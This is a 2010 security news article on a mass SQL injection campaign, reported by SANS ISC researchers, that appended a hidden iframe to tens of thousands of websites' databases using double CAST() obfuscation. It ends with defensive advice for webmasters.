Aug 16, 2010 12:02 GMT  ·  By

Tens of thousands of websites recently compromised in an injection attack, which employs some unusual obfuscation techniques, could start serving a malicious payload at any time.

Security researchers from the SANS Internet Storm Center (ISC) warn of a new SQL injection-like attack, which has compromised a significant number of websites.

The injected code is obfuscated inside the database using an unusual technique which involves calling the CAST() function twice to convert the string between different character sets.

First a variable @s is declared. Then the variable is defined by requesting a CAST on a string of hexadecimal values and finally the variable is executed.

The variable contains a second CAST command, which decodes to a hidden <iframe> element that calls a php script from a nemohuildiin.ru domain.

"This attack will try to update every varchar column in your database to append the iframe text shown. This has been a massive and successful attack," Manuel Humberto Santander Peláez, the ISC handler who investigated the compromise, writes.

Searching for the rogue iframe code on Google reveals over 55,000 results, but many could represent different infected pages under the same domain. Bing on the other hand only lists around 27,000 hits.

An interesting aspect is that there is currently no payload being served by the rogue php script on the nemohuildiin.ru domain, which is odd for a new attack.

This indicates that the compromised websites are waiting in standby and could start serving malicious content to their visitors at any time.

It's common for attackers to perform scans and build lists of vulnerable sites for later use mass code injection campaigns. However, it's unusual to exploit them and then wait for the right time to deliver the payload.

In his post on ISC diary, Mr. Peláez gives webmasters several advices to help them keep their websites secure against such attacks.

"Your web application should have predetermined SQL sentences for data access. If the user request some specific information, the application invokes the specific store procedure, so there is no possibility of crafting dynamic SQL request," one of them reads.